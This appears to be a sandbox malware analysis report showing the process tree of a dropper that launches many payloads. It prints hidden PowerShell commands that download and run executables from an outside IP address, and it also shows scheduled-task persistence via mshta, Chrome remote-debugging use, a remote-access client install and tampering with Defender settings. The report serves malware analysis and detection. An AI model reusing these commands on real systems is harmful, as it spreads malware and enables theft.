PID 2808 wrote to memory of 1796	2808	skotes.exe	44
PID 2808 wrote to memory of 1796	2808	skotes.exe	44
PID 1796 wrote to memory of 2740	1796	7be12f2342.exe	45
PID 1796 wrote to memory of 2740	1796	7be12f2342.exe	45
PID 1796 wrote to memory of 2740	1796	7be12f2342.exe	45
PID 1796 wrote to memory of 2740	1796	7be12f2342.exe	45
PID 1796 wrote to memory of 2724	1796	7be12f2342.exe	46
PID 1796 wrote to memory of 2724	1796	7be12f2342.exe	46
PID 1796 wrote to memory of 2724	1796	7be12f2342.exe	46
PID 1796 wrote to memory of 2724	1796	7be12f2342.exe	46
PID 2740 wrote to memory of 2672	2740	cmd.exe	48
PID 2740 wrote to memory of 2672	2740	cmd.exe	48
PID 2740 wrote to memory of 2672	2740	cmd.exe	48
PID 2740 wrote to memory of 2672	2740	cmd.exe	48
PID 2724 wrote to memory of 2492	2724	mshta.exe	49
PID 2724 wrote to memory of 2492	2724	mshta.exe	49
PID 2724 wrote to memory of 2492	2724	mshta.exe	49
PID 2724 wrote to memory of 2492	2724	mshta.exe	49
PID 2808 wrote to memory of 2032	2808	skotes.exe	51
PID 2808 wrote to memory of 2032	2808	skotes.exe	51
PID 2808 wrote to memory of 2032	2808	skotes.exe	51
PID 2808 wrote to memory of 2032	2808	skotes.exe	51
PID 2032 wrote to memory of 1032	2032	cmd.exe	53
PID 2032 wrote to memory of 1032	2032	cmd.exe	53
PID 2032 wrote to memory of 1032	2032	cmd.exe	53

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
"C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe
    "C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:680
  - - C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
      "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: AddClipboardFormatListener
      PID:2392
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 14:08 /du 23:59 /sc daily /ri 1 /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2284
- - C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe
    "C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"
      4⤵
      Enumerates connected drives
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1732
- - C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2280
- - C:\Users\Admin\AppData\Local\Temp\1089179101\7be12f2342.exe
    "C:\Users\Admin\AppData\Local\Temp\1089179101\7be12f2342.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn Gm2XTmagzMd /tr "mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2740
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn Gm2XTmagzMd /tr "mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2672
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2724
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2492
      - C:\Users\Admin\AppData\Local\Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
        
        "C:\Users\Admin\AppData\Local\Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word
      4⤵
      System Location Discovery: System Language Discovery
      PID:1032
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:600
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:728
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:892
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2484
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2088
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2912
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "XNuwGmakeSC" /tr "mshta \"C:\Temp\oIlpHh5KE.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2856
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\oIlpHh5KE.hta"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1820
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1744
- - C:\Users\Admin\AppData\Local\Temp\1089273001\52206648a6.exe
    "C:\Users\Admin\AppData\Local\Temp\1089273001\52206648a6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2504
- - C:\Users\Admin\AppData\Local\Temp\1089274001\f29907a492.exe
    "C:\Users\Admin\AppData\Local\Temp\1089274001\f29907a492.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 272 -s 800
      4⤵
      Loads dropped DLL
      Program crash
      PID:1488
- - C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:876
    - - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2176
      - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        6⤵
        Executes dropped EXE
        
        PID:2468
      - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        6⤵
        Executes dropped EXE
        
        PID:2312
      - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:988
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 572
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:272
    - - C:\Users\Admin\AppData\Local\Temp\10009640101\372485f12e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10009640101\372485f12e.exe"
        5⤵
        Enumerates VirtualBox registry keys
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:2604
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:1740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6449758,0x7fef6449768,0x7fef6449778
        7⤵
        
        PID:932
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        7⤵
        
        PID:852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:2
        7⤵
        
        PID:1620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1036 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:8
        7⤵
        
        PID:1708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:8
        7⤵
        
        PID:2536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2236 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3144
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2320 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1512 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:2
        7⤵
        
        PID:3580
      - C:\Users\Admin\AppData\Local\Temp\service123.exe
        
        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
        6⤵
        Executes dropped EXE
        
        PID:3400
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3424
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 972
        6⤵
        Program crash
        
        PID:3776
    - - C:\Users\Admin\AppData\Local\Temp\10009650101\3d2e5da9a6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10009650101\3d2e5da9a6.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2032
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        
        PID:556
- - C:\Users\Admin\AppData\Local\Temp\1089276001\db484a9c5c.exe
    "C:\Users\Admin\AppData\Local\Temp\1089276001\db484a9c5c.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2292
- - C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2984
- - C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Modifies system certificate store
      PID:3004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:3756
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef62f9758,0x7fef62f9768,0x7fef62f9778
        6⤵
        
        PID:3768
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:3884
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:2
        6⤵
        
        PID:3940
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1584 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
        6⤵
        
        PID:3960
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
        6⤵
        
        PID:4032
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3272
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2240 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3292
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1436 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:2
        6⤵
        
        PID:836
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2520 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1504
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3492 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
        6⤵
        
        PID:3056
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3608 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
        6⤵
        
        PID:3156
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 556
      4⤵
      Loads dropped DLL
      Program crash
      PID:344
- - C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe
    "C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"
    3⤵
    - Executes dropped EXE
    PID:596
- - C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1696
  - - C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 556
      4⤵
      Program crash
      PID:2984
- - C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
    "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1296
  - - C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
      "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1628
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 500
      4⤵
      Program crash
      PID:580
- - C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:816
- - C:\Users\Admin\AppData\Local\Temp\1089286001\aca90f55db.exe
    "C:\Users\Admin\AppData\Local\Temp\1089286001\aca90f55db.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1464
- - C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
    "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2176
